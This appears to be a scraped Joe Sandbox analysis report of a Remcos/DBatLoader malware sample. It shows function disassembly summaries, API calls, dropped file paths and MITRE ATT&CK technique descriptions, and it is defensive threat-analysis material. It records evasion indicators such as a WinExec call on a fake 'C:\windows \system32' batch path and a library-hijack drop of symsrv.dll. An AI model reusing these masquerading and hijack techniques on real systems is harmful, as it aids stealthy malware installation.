Uniqueness Score: -1.00%

Analysis Process: easinvoker.exePID: 6500, Parent PID: 5296COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.6%
Total number of Nodes:	122
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 613C1446 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WinExec.KERNEL32(?,?,?,613C14A5), ref: 613C1461
ExitProcess.KERNEL32(?,?,?,613C14A5), ref: 613C146F

Strings

C:\windows \system32\KDECO.bat, xrefs: 613C1453

Memory Dump Source

Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd

Similarity

API ID: ExecExitProcess
String ID: C:\windows \system32\KDECO.bat
API String ID: 4112423671-3197246866
Opcode ID: b3456a760db7434f8d5867fb47a99551f6fd8c56f163cafdbc40650464793521
Instruction ID: 4c5d8cd5d910ffdc7edc5c81563eb71587e0c072eced2b6f5a338f6d84e390be
Opcode Fuzzy Hash: b3456a760db7434f8d5867fb47a99551f6fd8c56f163cafdbc40650464793521
Instruction Fuzzy Hash: 29D0123431192888FB00AB66FCA23D12322E794B40F5C0021C81E5B3B0CE2ACA228380

Uniqueness

Uniqueness Score: -1.00%

Function 613C1E10 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddFunctionTable.KERNEL32 ref: 613C1EEA

Strings

.pdata, xrefs: 613C1E31

Memory Dump Source

Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd

Similarity

API ID: FunctionTable
String ID: .pdata
API String ID: 1252446317-4177594709
Opcode ID: 1a5f6c24201736e11f71e867ddcf66c4e02aca3fdeeedcbeef6722f7c10745f6
Instruction ID: 9b48684eaa54373ac2d77e7686239314a7b50e7976879dfb6e5eb98d9026d313
Opcode Fuzzy Hash: 1a5f6c24201736e11f71e867ddcf66c4e02aca3fdeeedcbeef6722f7c10745f6
Instruction Fuzzy Hash: 0621D272702164CAFB058F69D9443947BB2A789F9CF4CC020CE0E97304EB36CA51DB51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 613C1B60 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCaptureContext.KERNEL32 ref: 613C1B74
RtlLookupFunctionEntry.KERNEL32 ref: 613C1B8B
RtlVirtualUnwind.KERNEL32 ref: 613C1BCD
SetUnhandledExceptionFilter.KERNEL32 ref: 613C1C14
UnhandledExceptionFilter.KERNEL32 ref: 613C1C21
GetCurrentProcess.KERNEL32 ref: 613C1C27
TerminateProcess.KERNEL32 ref: 613C1C35

Strings

@u<a, xrefs: 613C1C1A

Memory Dump Source

Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
String ID: @u<a
API String ID: 3266983031-2704016811
Opcode ID: 3fe8edf890545a3c8ca01450929e34242cb447bf27343d606198e146d2ccdf0e
Instruction ID: f94ddf039621e221967baa8edb73e03f7702b5fa200f94eb725674a2b633c061
Opcode Fuzzy Hash: 3fe8edf890545a3c8ca01450929e34242cb447bf27343d606198e146d2ccdf0e
Instruction Fuzzy Hash: 0B21E375611B64C9EB008F62F8443C937B6BB48B98F495126DD8F27724EF3AC6248390

Uniqueness

Uniqueness Score: -1.00%

Function 613C1A80 Relevance: 7.6, APIs: 5, Instructions: 57
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 613C1AC5
GetCurrentProcessId.KERNEL32 ref: 613C1AD0
GetCurrentThreadId.KERNEL32 ref: 613C1AD8
GetTickCount.KERNEL32 ref: 613C1AE0
QueryPerformanceCounter.KERNEL32 ref: 613C1AED

Memory Dump Source

Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 2ea03832c0dc0cb9eba84dc4ab77c4331fcba75045809e3b0057f4675091efb6
Instruction ID: 414e8fcb770a865792631034dca2ba3ece076a107bf7b4a66efec48a9980259e
Opcode Fuzzy Hash: 2ea03832c0dc0cb9eba84dc4ab77c4331fcba75045809e3b0057f4675091efb6
Instruction Fuzzy Hash: DE11B233712A6082FB109B25F808385B261B788BE4F0C4235DD5F13BA4DA3DCA958340

Uniqueness

Uniqueness Score: -1.00%

Function 613C1050 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 146
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 613C1099

Strings

@y<a, xrefs: 613C10A8, 613C112F
Xy<a, xrefs: 613C11B8
PA<a, xrefs: 613C115E
Hy<a, xrefs: 613C1077, 613C10F3
Py<a, xrefs: 613C11A0

Memory Dump Source

Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd

Similarity

API ID: Sleep
String ID: @y<a$Hy<a$PA<a$Py<a$Xy<a
API String ID: 3472027048-4231909830
Opcode ID: 6a04c88ca713c1909bc590f0e4298c2beab8979a6fd2d427b8616973f60fcf11
Instruction ID: fa2c0e70f73d20439f9ad63a0ffe88be5d3e49048c325fff2c4482aeb8ecd435
Opcode Fuzzy Hash: 6a04c88ca713c1909bc590f0e4298c2beab8979a6fd2d427b8616973f60fcf11
Instruction Fuzzy Hash: A041C136702624C9F7029B5AE95039527B6A784FDCF48C022DE0E97354DF3ACD91D352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF60E689E54 Relevance: 9.0, APIs: 6, Instructions: 47
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF67FF60E689E54(long long __rbx, signed long long _a16, long long _a32) {

				_a32 = __rbx;
				_a16 = _a16 & 0x00000000;
			}

0x7ff60e689e54
0x7ff60e689e68

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF60E689E84
GetCurrentProcessId.KERNEL32 ref: 00007FF60E689E92
GetCurrentThreadId.KERNEL32 ref: 00007FF60E689E9E
GetTickCount.KERNEL32 ref: 00007FF60E689EAA
GetTickCount.KERNEL32 ref: 00007FF60E689EBA
QueryPerformanceCounter.KERNEL32 ref: 00007FF60E689ED5

Memory Dump Source

Source File: 00000016.00000002.455867364.00007FF60E671000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60E670000, based on PE: true

Associated: 00000016.00000002.455839226.00007FF60E670000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000016.00000002.455918510.00007FF60E68C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000016.00000002.455928988.00007FF60E68D000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff60e670000_easinvoker.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
Instruction ID: ddc207f2111f5900a4dc08e1fecb9abf84cec6dbecea3f5c1538ac88474ce6e3
Opcode Fuzzy Hash: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
Instruction Fuzzy Hash: 68111D32614F418AEB10CF64FC5816933A4F75A758F141A31FAAD86764DF7DD1A49340

Uniqueness

Uniqueness Score: -1.00%

Function 613C16C0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 210
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,?,?,?,?,?,613C3014,?,?,?,?,613C12F5), ref: 613C1870
VirtualProtect.KERNEL32(?,?,?,?,?,?,613C3014,?,?,?,?,613C12F5), ref: 613C1892

Strings

Unknown pseudo relocation bit size %d., xrefs: 613C194B
Unknown pseudo relocation protocol version %d., xrefs: 613C19AC
VirtualQuery failed for %d bytes at address %p, xrefs: 613C1691, 613C1995

Memory Dump Source

Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
API String ID: 1027372294-974437099
Opcode ID: ac37564a0943cd9c4829d9f00c113f258bab8429c18220a49573c59559e13634
Instruction ID: d1b4ddb9884753ba9f060f2ad50529926f9c9f07c0d7013e73f46a45df094a5d
Opcode Fuzzy Hash: ac37564a0943cd9c4829d9f00c113f258bab8429c18220a49573c59559e13634
Instruction Fuzzy Hash: C471CD76B11A24C6EB01CB66E94078A7772B744FACF08C115CD1F27358DB3AC905E382

Uniqueness

Uniqueness Score: -1.00%

Function 613C1550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 613C1606

Strings

Address %p has no image-section, xrefs: 613C1557, 613C16A2
VirtualQuery failed for %d bytes at address %p, xrefs: 613C1691

Memory Dump Source

Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true

Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 1804819252-157664173
Opcode ID: ceb095db029ccd83e1a4bc7a7c806a4770a528e67f66955d3a5e886fd59690f7
Instruction ID: 1549435389f1d83eb98944755ae3b0791324c1eeac1aff2d4bd9f122e5cf5d3c
Opcode Fuzzy Hash: ceb095db029ccd83e1a4bc7a7c806a4770a528e67f66955d3a5e886fd59690f7
Instruction Fuzzy Hash: BD31EF77701A64D5EA119F16EC00B957B76B788FE8F0C8125EE1E17350DB39CA52C780

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0vJrK0NCd1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Threatname: DBatLoader

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe (copy)

C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp

C:\Program Files\Common Files\system\symsrv.dll

C:\ProgramData\remcos\logs.dat

C:\Users\Public\Elpuxpki.url

C:\Users\Public\Libraries\Elpuxpki.PIF

C:\Users\Public\Libraries\ElpuxpkiO.bat

Windows Analysis Report
0vJrK0NCd1.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre